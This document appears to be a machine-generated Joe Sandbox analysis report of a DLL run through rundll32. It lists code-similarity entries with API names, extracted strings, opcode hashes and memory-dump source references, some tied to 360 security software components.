                                                                                                  • Instruction ID: 03153c84c80422bb1fe0896f106c581181dc8d0379737f626a13d6e79d0fde53
                                                                                                  • Opcode Fuzzy Hash: 7b2e34c13297d3253356bfea7e55ba0dc334a20ed8928643ae353c0c55a14f29
                                                                                                  • Instruction Fuzzy Hash: FF416C36201F8995E7A38F25E8403DA73A5F7887A4F598225EA9D433A4EF38C659C350
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: emc$mpt$nct
                                                                                                  • API String ID: 0-4018135154
                                                                                                  • Opcode ID: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                                  • Instruction ID: 4437dbb73dbe2b615a95de1095330fd5d3d5a6b349df20e8dd5e5932057711ae
                                                                                                  • Opcode Fuzzy Hash: de2908332be039851882f27ba843e54a0a4e6a129764ff773922d891e26d8285
                                                                                                  • Instruction Fuzzy Hash: 00416872200B499AEB82DF71D8403DA37B0F3587D8F858912FA28976A9DF34C659C790
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: NTDLL.DLL$ZwSetInformationThread
                                                                                                  • API String ID: 1646373207-2735485441
                                                                                                  • Opcode ID: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                                  • Instruction ID: b89890f0d555bdc3e142d7496d6436052e72b1d505dadace56c849a3f497b7c1
                                                                                                  • Opcode Fuzzy Hash: 42bcdad47f616cafdcd5b405ab44a7d36b4e0dac125c8dcdc21394efa803f9cc
                                                                                                  • Instruction Fuzzy Hash: 10315472A04B8886E6829B24D5017E86760FB987C4F05E625FF5D62293EF35E7CCC311
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MutexRelease
                                                                                                  • String ID: DELETE FROM 'MT'$select * from sqlite_sequence;$update sqlite_sequence set seq = 0 where name='MT';
                                                                                                  • API String ID: 1638419-14785165
                                                                                                  • Opcode ID: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                                  • Instruction ID: 2735ef6a2105b6c033439e84eaa5791c9d84b25ec53eae267885e45c8fb0a052
                                                                                                  • Opcode Fuzzy Hash: 881e86d389d9cefced57cf04117e8820d9d165fbcb2647cbb323e1f898b7160a
                                                                                                  • Instruction Fuzzy Hash: 2231CE32305B4982EAA59B64E5903AD6390F78CBE0F089224EF6D57BD1CF69CA598700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@?terminate@@free
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 3373266647-1018135373
                                                                                                  • Opcode ID: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
                                                                                                  • Instruction ID: 594e821370d35c74b48cca41d1a30539acd19f7ec6fc8343c4dbd888121ab54a
                                                                                                  • Opcode Fuzzy Hash: d73ca4be5f3c30bec2958ddaeb0430c1daa0421a04bf28af6faf66de19823b01
                                                                                                  • Instruction Fuzzy Hash: 6F21F67230174881EFA69F29C4543B927A1EB49FD8F789521EA2D077D6CF29CA89C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value_time64
                                                                                                  • String ID: MsgCenter$opentime_afterupdate
                                                                                                  • API String ID: 785988768-2434204715
                                                                                                  • Opcode ID: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                                  • Instruction ID: fc05a4dbc7e4eba58b3f0245281c2719f95df9f8cff95e83ed4d87eeecbf7a83
                                                                                                  • Opcode Fuzzy Hash: 5bb0f640ed1e05b6f5fb6319ad101f5784147dd22b425cd5bc3155a5095c0593
                                                                                                  • Instruction Fuzzy Hash: F021A272600B4887E752CF28D4407897BA0F788BF4F508325BA69537E4DF34C649CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@_wcslwrmemset
                                                                                                  • String ID: Global\QIHOO360_%s
                                                                                                  • API String ID: 2483156104-3710684550
                                                                                                  • Opcode ID: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                                  • Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
                                                                                                  • Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
                                                                                                  • Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$AddressHandleModuleProc
                                                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                                                  • API String ID: 1929421221-2252518459
                                                                                                  • Opcode ID: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                                                  • Instruction ID: b7589bd7c9edc25a710676dc7680ca351ec7a130bddfa3bcd3ac7e714d28a79a
                                                                                                  • Opcode Fuzzy Hash: 3abeb8fc91df8dd5900424b586f49943e6197e38022a5c10ccb5856e26316cfc
                                                                                                  • Instruction Fuzzy Hash: 5B216F72214A4882E751DF68E84478AB760FB897F4F408301F5BD53AE9DF78C299CB45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID: MsgCenter$opentime_traystartup
                                                                                                  • API String ID: 3702945584-2252518459
                                                                                                  • Opcode ID: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                                  • Instruction ID: 822726540527e7bff4823bd2222deb8b26a33040d1884c58a740bbbc5b89d818
                                                                                                  • Opcode Fuzzy Hash: e7e1ea0997a0aebb528af51b835e443ca0a464db8d25fc4fd5322d43dc3a84cf
                                                                                                  • Instruction Fuzzy Hash: A631C476201B488AEBA18F25D8443D937A4F7487ACF418715EA6C02BE8EF38C258C784
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$LocalSystemsscanf
                                                                                                  • String ID: %hu-%hu-%hu %hu:%hu:%hu
                                                                                                  • API String ID: 34346384-1004895946
                                                                                                  • Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                                  • Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
                                                                                                  • Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
                                                                                                  • Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LongNamePathmemsetwcschr
                                                                                                  • String ID: System32
                                                                                                  • API String ID: 1234868084-919923750
                                                                                                  • Opcode ID: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                                                  • Instruction ID: 022cfa0bf7d635e91ec6b184de1930e682d5e478c1da967905a178ce1f931210
                                                                                                  • Opcode Fuzzy Hash: 63ae055987751f564649761a82e02fa83986ab2b29aab6a60c23bad4ffdf8bdd
                                                                                                  • Instruction Fuzzy Hash: DA117536304A4892EBA1DB55E4843DA23A0F78CBD4F948625ABBD437D5DF38C699C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??1exception@@FileHeadermemset
                                                                                                  • String ID: bad allocation$csm
                                                                                                  • API String ID: 3064007109-2003371537
                                                                                                  • Opcode ID: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
                                                                                                  • Instruction ID: a6dd51a1d05e896956d3c811062f43cd0c17e0d4951ee49045dad2b426ca4241
                                                                                                  • Opcode Fuzzy Hash: b6a60749b78c48c230b9495ee51191fab89657cf486f85ec67875e06bd0adf6d
                                                                                                  • Instruction Fuzzy Hash: 10214772609B8496DB51CF10F4443CEB3A4F3883A0F514229E6AD47BA4DF79CA49CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
                                                                                                  • String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
                                                                                                  • API String ID: 28297470-3177478685
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
                                                                                                  • String ID: ..\360NetBase64.dll
                                                                                                  • API String ID: 2373086246-4183035884
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: wcsncmp$DirectoryPath
                                                                                                  • String ID: \\?\
                                                                                                  • API String ID: 911398208-4282027825
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
                                                                                                  • String ID: ..\safemon\FreeSaaS.tpi
                                                                                                  • API String ID: 154803636-205188023
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
                                                                                                  • CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
                                                                                                  • String ID: D:P(OA;;FA;;;WD)
                                                                                                  • API String ID: 794372803-936388898
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                  • _wcsicmp.MSVCRT ref: 000000018002AE4E
                                                                                                    • Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: FromHeapProcessString_wcsicmp
                                                                                                  • String ID: $CLSID$ftp:
                                                                                                  • API String ID: 2012545421-381575252
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740668140-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemset$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 529592607-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
                                                                                                  • API String ID: 2081463915-2936173157
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemset$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 529592607-0
                                                                                                  • Opcode ID: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
                                                                                                  • Instruction ID: 645fb74c30286fe1cf00211cd1a8741acda599680070850ad10f3b39ebb77e1a
                                                                                                  • Opcode Fuzzy Hash: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
                                                                                                  • Instruction Fuzzy Hash: 695106B3214B8886E795DF26D8007E977A5F748BD8F64C115EE1A87784DF38C64ACB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterInitializeLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3991485460-0
                                                                                                  • Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                                  • Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
                                                                                                  • Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                                  • Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                                                  • Instruction ID: d086f90ac81a06e5d512d2f495a144483870d0a007861e51eb34273852a96ff0
                                                                                                  • Opcode Fuzzy Hash: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                                                  • Instruction Fuzzy Hash: 65516B326047888AEBA68F5AA0403EE73A4F7887D5F108115FF9957BD8CF3AD655CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??2@Free$??3@Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1832687772-0
                                                                                                  • Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                                  • Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
                                                                                                  • Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                                  • Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
